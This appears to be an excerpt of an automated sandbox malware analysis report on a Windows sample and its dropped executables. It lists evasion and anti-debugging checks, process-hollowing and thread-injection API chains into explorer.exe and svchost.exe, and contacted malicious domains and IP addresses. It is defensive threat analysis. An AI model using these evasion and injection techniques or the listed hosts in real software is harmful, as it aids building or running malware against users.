                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeProcess information set: NOGPFAULTERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Found evasive API chain (may stop execution after checking mutex)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                      Tries to evade analysis by execution special instruction which cause usermode exceptionShow sources
                      Source: C:\Users\user\AppData\Local\Temp\1365.exeSpecial instruction interceptor: First address: 0000000000C96396 instructions 0F0B caused by: Known instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\1365.exeSpecial instruction interceptor: First address: 0000000000C9686E instructions 0F3F070BC745FCFFFFFFFF33C033D2 caused by: Unknown instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\1365.exeSpecial instruction interceptor: First address: 0000000000C9EAE0 instructions 0F0B caused by: Known instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\1365.exeSpecial instruction interceptor: First address: 0000000000C9ECD4 instructions 0F0B caused by: Known instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\1365.exeSpecial instruction interceptor: First address: 0000000000CA47F2 instructions 0F0B caused by: Known instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\1365.exeSpecial instruction interceptor: First address: 0000000000CA4976 instructions 0F3F070BC745FCFFFFFFFF33C033D2 caused by: Unknown instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\1365.exeSpecial instruction interceptor: First address: 0000000000C9D7F3 instructions 0F0B caused by: Known instruction #UD exception
                      Found evasive API chain (may stop execution after checking locale)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeEvasive API call chain: GetUserDefaultLangID, ExitProcess
                      Checks if the current machine is a virtual machine (disk enumeration)Show sources
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\adiicvbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\adiicvbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\adiicvbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\adiicvbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\adiicvbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\adiicvbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeEvasive API call chain: GetPEB, DecisionNodes, Sleep
                      Contains functionality to detect sleep reduction / modificationsShow sources
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_00406AA0
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020D6CF0
                      Found evasive API chain (may stop execution after checking computer name)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeEvasive API call chain: GetComputerName,DecisionNodes,Sleep
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe TID: 6480Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 579
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 441
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 407
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeAPI coverage: 9.3 %
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeAPI coverage: 6.3 %
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeAPI coverage: 9.3 %
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeAPI coverage: 4.1 %
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020D6CF0
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeEvaded block: after key decision
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeAPI call chain: ExitProcess graph end node
                      Source: explorer.exe, 00000003.00000000.693686948.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000003.00000000.689902002.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000003.00000000.693686948.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000003.00000000.728928584.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
                      Source: explorer.exe, 00000003.00000000.687377926.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
                      Source: explorer.exe, 00000003.00000000.728928584.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
                      Source: explorer.exe, 00000003.00000000.728928584.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeCode function: 11_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020D8A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020D6090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020D14D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020D12E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020D9930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020D9D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020D9BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeSystem information queried: ModuleInformation

                      Anti Debugging:

                      barindex
                      Found API chain indicative of debugger detectionShow sources
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeDebugger detection routine: GetTickCount, GetTickCount, DecisionNodes, ExitProcess or Sleep
                      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Roaming\adiicvbSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00409CAE LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00530083 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00540042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 5_2_00600083 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 5_2_00610042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_00470083 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_0048092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_00480D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_00401000 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_0040C180 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020B0083 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020D092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020D1250 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020D0D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020DC3D0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeCode function: 26_2_00540083 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeCode function: 26_2_00D5092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeCode function: 26_2_00D50D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\adiicvbProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_004037C4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_0040E300 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeMemory protected: page guard
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00408112 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_004071EC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_004037C4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_004033BB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeCode function: 11_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeCode function: 26_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\explorer.exeDomain query: github.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                      Source: C:\Windows\explorer.exeDomain query: raw.githubusercontent.com
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                      Source: C:\Windows\explorer.exeDomain query: unicupload.top
                      Source: C:\Windows\explorer.exeDomain query: srtuiyhuali.at
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exeDomain query: fufuiloirtu.com
                      Source: C:\Windows\explorer.exeDomain query: amogohuigotuli.at
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                      Source: C:\Windows\explorer.exeDomain query: bit.ly
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                      Source: C:\Windows\explorer.exeDomain query: goo.su
                      Source: C:\Windows\explorer.exeDomain query: transfer.sh
                      Source: C:\Windows\explorer.exeDomain query: a0620531.xsph.ru
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exeDomain query: privacytools-foryou-777.com
                      Source: C:\Windows\explorer.exeDomain query: softwaresworld.net
                      Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                      Source: C:\Windows\explorer.exeDomain query: unic11m.top
                      Benign windows process drops PE filesShow sources
                      Source: C:\Windows\explorer.exeFile created: vsiicvb.3.drJump to dropped file
                      Maps a DLL or memory area into another processShow sources
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Roaming\adiicvbSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Roaming\adiicvbSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Allocates memory in foreign processesShow sources
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 7E0000 protect: page execute and read and write
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeMemory written: C:\Users\user\Desktop\V91yW08J6p.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\adiicvbMemory written: C:\Users\user\AppData\Roaming\adiicvb base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeMemory written: C:\Users\user\AppData\Local\Temp\768F.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7E0000 value starts with: 4D5A
                      Contains functionality to inject code into remote processesShow sources
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00540110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Creates a thread in another existing process (thread injection)Show sources
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeThread created: C:\Windows\explorer.exe EIP: 4F01930
                      Source: C:\Users\user\AppData\Roaming\adiicvbThread created: unknown EIP: 4F41930
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeThread created: unknown EIP: 5C91A40
                      Writes to foreign memory regionsShow sources
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7E0000
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 81F008
                      .NET source code references suspicious native API functionsShow sources
                      Source: 768F.exe.3.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 768F.exe.3.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 13.0.768F.exe.2c0000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 13.0.768F.exe.2c0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 13.0.768F.exe.2c0000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 13.0.768F.exe.2c0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
